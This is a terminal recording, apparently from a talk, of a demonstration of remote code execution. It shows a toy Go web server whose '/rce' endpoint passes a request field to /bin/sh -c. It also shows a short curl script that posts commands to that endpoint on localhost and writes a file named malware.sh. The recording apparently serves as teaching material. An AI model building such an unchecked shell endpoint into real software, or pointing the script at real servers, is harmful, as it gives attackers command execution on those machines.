{"env": {"TERM": "xterm-256color", "SHELL": "/bin/bash"}, "version": 2, "timestamp": 1549728092, "width": 90, "idle_time_limit": 3.0, "height": 24}
[0.009367, "o", "\u001b[?1049h\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b]112\u0007\u001b[?25l\u001b[1;1H$\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[30m\u001b[42m[preso] 0:bash*Z                                        \"bmitch-asusr556l\" 11:01 09-Feb-19\u001b(B\u001b[m\u001b[24;1H\u001b[1;24r\u001b[H\u001b[2C\u001b[?12l\u001b[?25h"]
[1.473657, "o", "v"]
[1.580113, "o", "i"]
[1.680694, "o", "\u001b[C"]
[1.953306, "o", "m"]
[2.075273, "o", "a"]
[2.191534, "o", "i"]
[2.260386, "o", "n"]
[2.472768, "o", "."]
[2.617779, "o", "g"]
[2.718331, "o", "o"]
[2.933751, "o", "\r\n"]
[2.942104, "o", "\u001b[?25l\u001b[H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2d\u001b[?12l\u001b[?25h\u001b[?1h\u001b="]
[2.942868, "o", "\u001b[1;23r\u001b[H\u001b[K\r\n\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\"main.go\"\u001b[1;24r\u001b[H\u001b[23;10H\u001b[?25l\u001b[1;23r\u001b[H\u001b[23;11H29L,\u001b[C643C"]
[2.943051, "o", "\u001b[1;24r\u001b[H\u001b[23;20H"]
[2.943792, "o", "\u001b[Hpackage\u001b[Cmain\u001b[3;1Himport\u001b[C(\u001b[4;4H\"fmt\"\u001b[5;4H\"net/http\"\u001b[6;4H\"os/exec\"\r\n)\u001b[9;1Hfunc\u001b[Cmain()\u001b[C{\u001b[10;4Hhttp.HandleFunc(\"/\",\u001b[Croot)\u001b[11;4Hhttp.HandleFunc(\"/rce\",\u001b[Crce)\u001b[12;4Hfmt.Print(\"Ready\u001b[Cto\u001b[Creceive\u001b[Crequests\u001b[Con\u001b[Cport\u001b[C6666\\n\")\u001b[13;4Hhttp.ListenAndServe(\"127.0.0.1:6666\",\u001b[Cnil)\r\n}\u001b[16;1Hfunc\u001b[Croot(w\u001b[Chttp.ResponseWriter,\u001b[Cr\u001b[C*http.Request)\u001b[C{\u001b[17;4Hw.Header().Set(\"Server\",\u001b[C\"Very\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\")\u001b[18;4Hw.WriteHeader(200)\r\n}\u001b[21;1Hfunc\u001b[Crce(w\u001b[Chttp.ResponseWriter,\u001b[Cr\u001b[C*http.Request)\u001b[C{\u001b[22;4Hw.Header().Set(\"Server\",\u001b[C\"Very\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\")\u001b[1;23r\u001b[H\u001b[23;73H1,1\u001b[11CTop\u001b[1;24r\u001b[H\u001b[?12l\u001b[?25h"]
[3.517723, "o", "\u001b[?25l\u001b[24d\u001b[30m\u001b[42m[preso] 0:vi*Z                                          \"bmitch-asusr556l\" 11:01 09-Feb-19\u001b(B\u001b[m\u001b[1;1H\u001b[?12l\u001b[?25h"]
[3.518308, "o", "\u001b[1;23r\u001b[23;73H2\u001b[C0-1\u001b[1;24r\u001b[H\r\n"]
[4.017934, "o", "\u001b[1;23r\u001b[H\u001b[23;73H3\u001b[C1  \u001b[1;24r\u001b[H\u001b[2B"]
[4.047696, "o", "\u001b[1;23r\u001b[H\u001b[23;73H4\u001b[2C-3\u001b[1;24r\u001b[H\u001b[4;3H"]
[4.077297, "o", "\u001b[1;23r\u001b[H\u001b[23;73H5\u001b[1;24r\u001b[H\u001b[5;3H"]
[4.10708, "o", "\u001b[1;23r\u001b[H\u001b[23;73H6\u001b[1;24r\u001b[H\u001b[6;3H"]
[4.137732, "o", "\u001b[3;8H\u001b[46m(\u001b[7;1H)\u001b[1;23r\u001b[H\u001b[23;73H\u001b[49m7\u001b[2C  \u001b[1;24r\u001b[H\u001b[6B"]
[4.167771, "o", "\u001b[3;8H(\u001b[7;1H)\u001b[1;23r\u001b[H\u001b[23;73H8\u001b[C0-1\u001b[1;24r\u001b[H\u001b[7B"]
[4.197898, "o", "\u001b[1;23r\u001b[H\u001b[23;73H9\u001b[C1  \u001b[1;24r\u001b[H\u001b[8B"]
[4.228088, "o", "\u001b[1;23r\u001b[H\u001b[23;73H10,1-3\u001b[1;24r\u001b[H\u001b[10;3H"]
[4.258118, "o", "\u001b[1;23r\u001b[H\u001b[23;74H1\u001b[1;24r\u001b[H\u001b[11;3H"]
[4.87634, "o", "\r\u001b[7m  \u001b[Chttp.HandleFunc(\"/rce\", rce) \u001b[?25l\u001b(B\u001b[m"]
[4.87739, "o", "\u001b[23;18H\u001b[K\u001b[1;23r\u001b[H\u001b[23d\u001b[1m-- VISUAL LINE --\u001b[55C\u001b(B\u001b[m11,1-3\u001b[8CTop\u001b[1;24r\u001b[H\u001b[11;3H\u001b[?12l\u001b[?25h"]
[7.228348, "o", "\u001b[29C\u001b[K\u001b[23;1H\u001b[K\u001b[11d  \u001b[Chttp.HandleFunc(\"/rce\", rce)\u001b[1;23r\u001b[H\u001b[23;73H12,1-3\u001b[8CTop\u001b[1;24r\u001b[H\u001b[12;3H"]
[7.564718, "o", "\u001b[1;23r\u001b[H\u001b[23;74H3\u001b[1;24r\u001b[H\u001b[13;3H"]
[8.065203, "o", "\u001b[9;13H\u001b[46m{\u001b[14;1H}\u001b[1;23r\u001b[H\u001b[23;74H\u001b[49m4\u001b[2C  \u001b[1;24r\u001b[H\u001b[14d"]
[8.094729, "o", "\u001b[9;13H{\u001b[14;1H}\u001b[1;23r\u001b[H\u001b[23;74H5\u001b[C0-1\u001b[1;24r\u001b[H\u001b[15d"]
[8.124185, "o", "\u001b[1;23r\u001b[H\u001b[23;74H6\u001b[C3  \u001b[1;24r\u001b[H\u001b[16;3H"]
[8.155354, "o", "\u001b[1;23r\u001b[H\u001b[23;74H7\u001b[C1-3\u001b[1;24r\u001b[H\u001b[17;3H"]
[8.185275, "o", "\u001b[1;23r\u001b[H\u001b[23;74H8\u001b[1;24r\u001b[H\u001b[18;3H"]
[8.215389, "o", "\u001b[16;51H\u001b[46m{\u001b[19;1H}\u001b[1;23r\u001b[H\u001b[23;74H\u001b[49m9\u001b[2C  \u001b[1;24r\u001b[H\u001b[19d"]
[8.245936, "o", "\u001b[16;51H{\u001b[19;1H}\u001b[1;23r\u001b[H\u001b[23;73H20\u001b[C0-1\u001b[1;24r\u001b[H\u001b[20d"]
[8.276901, "o", "\u001b[1;23r\u001b[H\u001b[23;74H1\u001b[C3  \u001b[1;24r\u001b[H\u001b[21;3H"]
[8.308024, "o", "\u001b[1;23r\u001b[H\u001b[23;74H2\u001b[C1-3\u001b[1;24r\u001b[H\u001b[22;3H"]
[8.338161, "o", "\u001b[1;22r\u001b[H\u001b[22d\n\u001b[23;73H\u001b[K\u001b[22;4Hscript\u001b[C:=\u001b[Cr.FormValue(\"script\")\u001b[1;23r\u001b[H\u001b[23;73H23,1-3\u001b[8C14%\u001b[1;24r\u001b[H\u001b[22;3H"]
[8.368854, "o", "\u001b[1;22r\u001b[H\u001b[22d\n\u001b[23;73H\u001b[K\u001b[22;4Hfmt.Printf(\"Running:\u001b[C%s\\n\",\u001b[Cscript)\u001b[1;23r\u001b[H\u001b[23;73H24,1-3\u001b[8C28%\u001b[1;24r\u001b[H\u001b[22;3H"]
[8.399778, "o", "\u001b[1;22r\u001b[H\u001b[22d\n\u001b[23;73H\u001b[K\u001b[22;4Hcmd\u001b[C:=\u001b[Cexec.Command(\"/bin/sh\",\u001b[C\"-c\",\u001b[Cscript)\u001b[1;23r\u001b[H\u001b[23;73H25,1-3\u001b[8C42%\u001b[1;24r\u001b[H\u001b[22;3H"]
[8.648338, "o", "\u001b[1;22r\u001b[H\u001b[22d\n\u001b[23;73H\u001b[K\u001b[22;4Houtput,\u001b[C_\u001b[C:=\u001b[Ccmd.CombinedOutput()\u001b[1;23r\u001b[H\u001b[23;73H26,1-3\u001b[8C57%\u001b[1;24r\u001b[H\u001b[22;3H"]
[8.825136, "o", "\u001b[1;22r\u001b[H\u001b[22d\n\u001b[23;73H\u001b[K\u001b[22;4Hw.Write(output)\u001b[1;23r\u001b[H\u001b[23;73H27,1-3\u001b[8C71%\u001b[1;24r\u001b[H\u001b[22;3H"]
[8.99059, "o", "\u001b[1;22r\u001b[H\u001b[22d\n\u001b[23;73H\u001b[K\u001b[15;50H\u001b[46m{\u001b[22;1H}\u001b[1;23r\u001b[H\u001b[23;73H\u001b[49m28,1\u001b[10C85%\u001b[1;24r\u001b[H\u001b[22d"]
[9.146093, "o", "\u001b[1;22r\u001b[H\u001b[22d\n\u001b[23;73H\u001b[K\u001b[14;50H{\u001b[21;1H}\u001b[1;23r\u001b[H\u001b[23;73H29,0-1\u001b[8CBot\u001b[1;24r\u001b[H\u001b[22d"]
[9.448655, "o", "\u001b[14;50H\u001b[46m{\u001b[21;1H}\u001b[1;23r\u001b[H\u001b[23;74H\u001b[49m8\u001b[C1  \u001b[1;24r\u001b[H\u001b[21d"]
[9.948294, "o", "\u001b[14;50H{\u001b[21;1H}\u001b[1;23r\u001b[H\u001b[23;74H7\u001b[2C-3\u001b[1;24r\u001b[H\u001b[20;3H"]
[9.979508, "o", "\u001b[1;23r\u001b[H\u001b[23;74H6\u001b[1;24r\u001b[H\u001b[19;3H"]
[10.009057, "o", "\u001b[1;23r\u001b[H\u001b[23;74H5\u001b[1;24r\u001b[H\u001b[18;3H"]
[10.039464, "o", "\u001b[1;23r\u001b[H\u001b[23;74H4\u001b[1;24r\u001b[H\u001b[17;3H"]
[10.069685, "o", "\u001b[1;23r\u001b[H\u001b[23;74H3\u001b[1;24r\u001b[H\u001b[16;3H"]
[10.099672, "o", "\u001b[1;23r\u001b[H\u001b[23;74H2\u001b[1;24r\u001b[H\u001b[15;3H"]
[10.129135, "o", "\u001b[1;23r\u001b[H\u001b[23;74H1\u001b[C3  \u001b[1;24r\u001b[H\u001b[14;3H"]
[11.284928, "o", "\u001b[1;23r\u001b[H\u001b[23;74H2\u001b[C1-3\u001b[1;24r\u001b[H\u001b[15;3H"]
[11.466996, "o", "\u001b[1;23r\u001b[H\u001b[23;74H3\u001b[1;24r\u001b[H\u001b[16;3H"]
[12.840731, "o", "\r\u001b[7m  \u001b[Cscript := r.FormValue(\"script\") \u001b[?25l\u001b(B\u001b[m"]
[12.841778, "o", "\u001b[23;73H\u001b[K\u001b[1;23r\u001b[H\u001b[23d\u001b[1m-- VISUAL LINE --\u001b[55C\u001b(B\u001b[m23,1-3\u001b[8CBot\u001b[1;24r\u001b[H\u001b[16;3H\u001b[?12l\u001b[?25h"]
[14.936372, "o", "\u001b[32C\u001b[K\u001b[23;1H\u001b[K\u001b[7A  \u001b[Cscript := r.FormValue(\"script\")\u001b[1;23r\u001b[H\u001b[23;73H24,1-3\u001b[8CBot\u001b[1;24r\u001b[H\u001b[17;3H"]
[15.14192, "o", "\u001b[1;23r\u001b[H\u001b[23;74H5\u001b[1;24r\u001b[H\u001b[18;3H"]
[15.689414, "o", "\r\u001b[7m  \u001b[Ccmd := exec.Command(\"/bin/sh\", \"-c\", script) \u001b[?25l\u001b(B\u001b[m"]
[15.690472, "o", "\u001b[23;73H\u001b[K\u001b[1;23r\u001b[H\u001b[23d\u001b[1m-- VISUAL LINE --\u001b[55C\u001b(B\u001b[m25,1-3\u001b[8CBot\u001b[1;24r\u001b[H\u001b[18;3H\u001b[?12l\u001b[?25h"]
[18.258588, "o", "\u001b[45C\u001b[K\u001b[23;1H\u001b[K\u001b[72C\u001b[K\u001b[18;1H  \u001b[Ccmd := exec.Command(\"/bin/sh\", \"-c\", script)\u001b[1;23r\u001b[H\u001b[23d:\u001b[1;24r\u001b[H\u001b[23;2H"]
[19.190753, "o", "\u001b[1;23r\u001b[H\u001b[23;2Hq\u001b[1;24r\u001b[H\u001b[23;3H"]
[19.431141, "o", "\r"]
[19.432827, "o", "\u001b[K\u001b[?25l\u001b[H$ vi main.go\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2d\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[19.43354, "o", "$\u001b[C"]
[20.952068, "o", "\u001b[?25l\u001b[24;1H\u001b[30m\u001b[42m[preso] 0:bash*Z                                        \"bmitch-asusr556l\" 11:01 09-Feb-19\u001b(B\u001b[m\u001b[2;3H\u001b[?12l\u001b[?25h"]
[20.952282, "o", "g"]
[21.124564, "o", "o"]
[21.251644, "o", "\u001b[C"]
[21.494869, "o", "r"]
[21.59032, "o", "u"]
[21.788319, "o", "n"]
[21.857257, "o", "\u001b[C"]
[22.027236, "o", "m"]
[22.169144, "o", "a"]
[22.227422, "o", "i"]
[22.322683, "o", "n"]
[22.540745, "o", "."]
[22.945099, "o", "g"]
[23.029994, "o", "o"]
[23.319381, "o", "\r\n"]
[23.721673, "o", "\u001b[?25l\u001b[24d\u001b[30m\u001b[42m[preso] 0:sh*Z                                          \"bmitch-asusr556l\" 11:01 09-Feb-19\u001b(B\u001b[m\u001b[3;1H\u001b[?12l\u001b[?25h"]
[25.704252, "o", "\u001b[?25l\u001b[32m\u001b[9B──────────────────────────────────────────────\u001b[39m────────────────────────────────────────────\u001b[1;1H\u001b(B\u001b[m$ vi main.go\u001b[K\r\n$ go run main.go\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2B$\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[30m\u001b[42m[preso] 0:sh*                                           \"bmitch-asusr556l\" 11:01 09-Feb-19\u001b(B\u001b[m\u001b[3;1H\u001b[?12l\u001b[?25h"]
[25.813714, "o", "Ready\u001b[Cto\u001b[Creceive\u001b[Crequests\u001b[Con\u001b[Cport\u001b[C6666\r\n"]
[26.445774, "o", "\u001b[?25l\u001b[8B──────────────────────────────────────────────\u001b[32m────────────────────────────────────────────\u001b(B\u001b[m\u001b[13;3H\u001b[?12l\u001b[?25h"]
[26.446159, "o", "\u001b[?25l\u001b[24;1H\u001b[30m\u001b[42m[preso] 0:bash*                                         \"bmitch-asusr556l\" 11:01 09-Feb-19\u001b(B\u001b[m\u001b[13;3H\u001b[?12l\u001b[?25h"]
[27.798946, "o", "c"]
[27.994359, "o", "a"]
[28.068329, "o", "t"]
[28.200644, "o", "\u001b[C"]
[28.348845, "o", "e"]
[28.56288, "o", "x"]
[28.74891, "o", "p"]
[28.956222, "o", "loit.sh\u001b[C"]
[29.475919, "o", "\r\n"]
[29.476985, "o", "#!/bin/sh\u001b[16;1Hecho\u001b[C\"trying\u001b[Cto\u001b[Crun:\u001b[C$*\"\r\ncurl\u001b[C--data-urlencode\u001b[C\"script=$*\"\u001b[C-X\u001b[CPOST\u001b[Clocalhost:6666/rce\u001b[19;1H"]
[29.477321, "o", "$\u001b[C"]
[30.010744, "o", "\u001b[?25l\u001b[24;1H\u001b[30m\u001b[42m[preso] 0:bash*                                         \"bmitch-asusr556l\" 11:02 09-Feb-19\u001b(B\u001b[m\u001b[19;3H\u001b[?12l\u001b[?25h"]
[31.680905, "o", "."]
[31.754753, "o", "/"]
[31.995222, "o", "e"]
[32.172876, "o", "x"]
[32.262961, "o", "p"]
[32.441257, "o", "l"]
[32.624286, "o", "o"]
[32.803302, "o", "i"]
[32.93037, "o", "t"]
[33.164615, "o", "."]
[33.314219, "o", "s"]
[33.430573, "o", "h"]
[33.620423, "o", "\u001b[C"]
[33.81745, "o", "l"]
[33.939189, "o", "s"]
[34.039615, "o", "\u001b[C"]
[34.289248, "o", "-"]
[34.528195, "o", "l"]
[34.885166, "o", "\r\n"]
[34.886681, "o", "trying\u001b[Cto\u001b[Crun:\u001b[Cls\u001b[C-l\r\n"]
[35.116682, "o", "\u001b[4dRunning:\u001b[Cls\u001b[C-l\u001b[21;1H"]
[35.341974, "o", "total\u001b[C16\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[C230\u001b[CJan\u001b[C26\u001b[C15:33\u001b[CREADME.md\u001b[13;23r\u001b[H\u001b[23d-rwxr-xr-x\u001b[C1\u001b[C1000\u001b[C1000\u001b[2C98\u001b[CFeb\u001b[2C9\u001b[C16:01\u001b[Cexploit.sh\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[2C42\u001b[CJan\u001b[C26\u001b[C14:07\u001b[Cgo.mod\r\n-rw-r--r--\u001b[C1\u001b[C1000\u001b[C1000\u001b[C643\u001b[CFeb\u001b[2C9\u001b[C16:01\u001b[Cmain.go\r\n\u001b[?25l\u001b[24d\u001b[30m\u001b[42m[preso] 0:sh*                                           \"bmitch-asusr556l\" 11:02 09-Feb-19\u001b(B\u001b[m\u001b[24;1H\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[35.372765, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[36.900368, "o", "\u001b[?25l\r\n\u001b[30m\u001b[42m[preso] 0:bash*                                         \"bmitch-asusr556l\" 11:02 09-Feb-19\u001b(B\u001b[m\u001b[23;3H\u001b[?12l\u001b[?25h"]
[37.198989, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[37.293595, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[37.452415, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[37.636459, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[37.909025, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[38.506238, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hi\u001b[1;24r\u001b[H\u001b[23;17H"]
[38.601428, "o", "\u001b[13;23r\u001b[H\u001b[23;17Hd\u001b[1;24r\u001b[H\u001b[23;18H"]
[39.000288, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[1;24r\u001b[H\u001b[23d"]
[39.00173, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cid\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[39.015501, "o", "\u001b[5dRunning:\u001b[Cid\u001b[23;1H"]
[39.039834, "o", "\u001b[13;23r\u001b[H\u001b[23duid=1000\u001b[Cgid=1000\u001b[Cgroups=1000\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[39.041232, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[40.009946, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[40.078708, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[40.258079, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[40.445035, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[40.582703, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hp\u001b[1;24r\u001b[H\u001b[23;8H"]
[40.775077, "o", "\u001b[13;23r\u001b[H\u001b[23;8Hl\u001b[1;24r\u001b[H\u001b[23;9H"]
[40.964827, "o", "\u001b[13;23r\u001b[H\u001b[23;9Ho\u001b[1;24r\u001b[H\u001b[23;10H"]
[41.142587, "o", "\u001b[13;23r\u001b[H\u001b[23;10Hi\u001b[1;24r\u001b[H\u001b[23;11H"]
[41.243062, "o", "\u001b[13;23r\u001b[H\u001b[23;11Ht\u001b[1;24r\u001b[H\u001b[23;12H"]
[41.446876, "o", "\u001b[13;23r\u001b[H\u001b[23;12H.\u001b[1;24r\u001b[H\u001b[23;13H"]
[41.574052, "o", "\u001b[13;23r\u001b[H\u001b[23;13Hs\u001b[1;24r\u001b[H\u001b[23;14H"]
[41.701059, "o", "\u001b[13;23r\u001b[H\u001b[23;14Hh\u001b[1;24r\u001b[H\u001b[23;15H"]
[41.806897, "o", "\u001b[C"]
[42.024666, "o", "\u001b[13;23r\u001b[H\u001b[23;16He\u001b[1;24r\u001b[H\u001b[23;17H"]
[42.436948, "o", "\u001b[13;23r\u001b[H\u001b[23;17Hc\u001b[1;24r\u001b[H\u001b[23;18H"]
[42.707978, "o", "\u001b[13;23r\u001b[H\u001b[23;18Hh\u001b[1;24r\u001b[H\u001b[23;19H"]
[42.803286, "o", "\u001b[13;23r\u001b[H\u001b[23;19Ho\u001b[1;24r\u001b[H\u001b[23;20H"]
[42.966696, "o", "\u001b[C"]
[43.170662, "o", "\u001b[13;23r\u001b[H\u001b[23;21Hm\u001b[1;24r\u001b[H\u001b[23;22H"]
[43.297652, "o", "\u001b[13;23r\u001b[H\u001b[23;22Ha\u001b[1;24r\u001b[H\u001b[23;23H"]
[43.439919, "o", "\u001b[13;23r\u001b[H\u001b[23;23Hl\u001b[1;24r\u001b[H\u001b[23;24H"]
[43.747855, "o", "\u001b[13;23r\u001b[H\u001b[23;24Hw\u001b[1;24r\u001b[H\u001b[23;25H"]
[43.822098, "o", "\u001b[13;23r\u001b[H\u001b[23;25Ha\u001b[1;24r\u001b[H\u001b[23;26H"]
[44.032866, "o", "\u001b[13;23r\u001b[H\u001b[23;26Hr\u001b[1;24r\u001b[H\u001b[23;27H"]
[44.122846, "o", "\u001b[13;23r\u001b[H\u001b[23;27He\u001b[1;24r\u001b[H\u001b[23;28H"]
[44.34622, "o", "\u001b[C"]
[44.641703, "o", "\u001b[13;23r\u001b[H\u001b[23;29H\\\u001b[1;24r\u001b[H\u001b[23;30H"]
[44.928586, "o", "\u001b[13;23r\u001b[H\u001b[23;30H>\u001b[1;24r\u001b[H\u001b[23;31H"]
[45.157943, "o", "\u001b[C"]
[45.555262, "o", "\u001b[13;23r\u001b[H\u001b[23;32Hm\u001b[1;24r\u001b[H\u001b[23;33H"]
[45.645391, "o", "\u001b[13;23r\u001b[H\u001b[23;33Ha\u001b[1;24r\u001b[H\u001b[23;34H"]
[45.745858, "o", "\u001b[13;23r\u001b[H\u001b[23;34Hl\u001b[1;24r\u001b[H\u001b[23;35H"]
[45.959604, "o", "\u001b[13;23r\u001b[H\u001b[23;35Hw\u001b[1;24r\u001b[H\u001b[23;36H"]
[46.234615, "o", "\u001b[13;23r\u001b[H\u001b[23;36Ha\u001b[1;24r\u001b[H\u001b[23;37H"]
[46.36698, "o", "\u001b[13;23r\u001b[H\u001b[23;37Hr\u001b[1;24r\u001b[H\u001b[23;38H"]
[46.446408, "o", "\u001b[13;23r\u001b[H\u001b[23;38He\u001b[1;24r\u001b[H\u001b[23;39H"]
[46.692245, "o", "\u001b[13;23r\u001b[H\u001b[23;39H.\u001b[1;24r\u001b[H\u001b[23;40H"]
[46.861036, "o", "\u001b[13;23r\u001b[H\u001b[23;40Hs\u001b[1;24r\u001b[H\u001b[23;41H"]
[47.006595, "o", "\u001b[13;23r\u001b[H\u001b[23;41Hh\u001b[1;24r\u001b[H\u001b[23;42H"]
[47.56304, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[1;24r\u001b[H\u001b[23d"]
[47.564542, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cecho\u001b[Cmalware\u001b[C>\u001b[Cmalware.sh\r\n\u001b[1;24r\u001b[H\u001b[23d"]
[47.579083, "o", "\u001b[6dRunning:\u001b[Cecho\u001b[Cmalware\u001b[C>\u001b[Cmalware.sh\u001b[23;1H"]
[47.580915, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[48.972666, "o", "\u001b[13;23r\u001b[H\u001b[23;3Hl\u001b[1;24r\u001b[H\u001b[23;4H"]
[49.116238, "o", "\u001b[13;23r\u001b[H\u001b[23;4Hs\u001b[1;24r\u001b[H\u001b[23;5H"]
[49.227403, "o", "\u001b[C"]
[49.424619, "o", "\u001b[13;23r\u001b[H\u001b[23;6H-\u001b[1;24r\u001b[H\u001b[23;7H"]
[49.552396, "o", "\u001b[13;23r\u001b[H\u001b[23;7Ha\u001b[1;24r\u001b[H\u001b[23;8H"]
[49.637093, "o", "\u001b[13;23r\u001b[H\u001b[23;8Hl\u001b[1;24r\u001b[H\u001b[23;9H"]
[50.014931, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[1;24r\u001b[H\u001b[23d"]
[50.017692, "o", "\u001b[13;23r\u001b[H\u001b[23dtotal\u001b[C32\r\n\u001b[1;24r\u001b[H\u001b[23d\u001b[13;23r\u001b[H\u001b[23ddrwxr-xr-x\u001b[2C3\u001b[Cbmitch\u001b[Cbmitch\u001b[C4096\u001b[CFeb\u001b[2C9\u001b[C11:02\u001b[C\u001b[34m\u001b[1m.\u001b(B\u001b[m\r\ndrwxr-xr-x\u001b[C85\u001b[Cbmitch\u001b[Cbmitch\u001b[C4096\u001b[CJan\u001b[C26\u001b[C09:05\u001b[C\u001b[34m\u001b[1m..\u001b(B\u001b[m\r\n-rwxr-xr-x\u001b[2C1\u001b[Cbmitch\u001b[Cbmitch\u001b[3C98\u001b[CFeb\u001b[2C9\u001b[C11:01\u001b[C\u001b[32m\u001b[1mexploit.sh\u001b(B\u001b[m\r\ndrwxr-xr-x\u001b[2C8\u001b[Cbmitch\u001b[Cbmitch\u001b[C4096\u001b[CFeb\u001b[2C9\u001b[C11:01\u001b[C\u001b[34m\u001b[1m.git\u001b(B\u001b[m\r\n-rw-r--r--\u001b[2C1\u001b[Cbmitch\u001b[Cbmitch\u001b[3C42\u001b[CJan\u001b[C26\u001b[C09:07\u001b[Cgo.mod\r\n-rw-r--r--\u001b[2C1\u001b[Cbmitch\u001b[Cbmitch\u001b[2C643\u001b[CFeb\u001b[2C9\u001b[C11:01\u001b[Cmain.go\r\n-rw-r--r--\u001b[2C1\u001b[Cbmitch\u001b[Cbmitch\u001b[4C8\u001b[CFeb\u001b[2C9\u001b[C11:02\u001b[Cmalware.sh\r\n-rw-r--r--\u001b[2C1\u001b[Cbmitch\u001b[Cbmitch\u001b[2C230\u001b[CJan\u001b[C26\u001b[C10:33\u001b[CREADME.md\r\n"]
[50.017953, "o", "\u001b[1;24r\u001b[H\u001b[23d\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[56.237344, "o", "\u001b[1;24r"]
[56.237869, "o", "\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b]112\u0007\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1049l[detached (from session preso)]\r\n"]
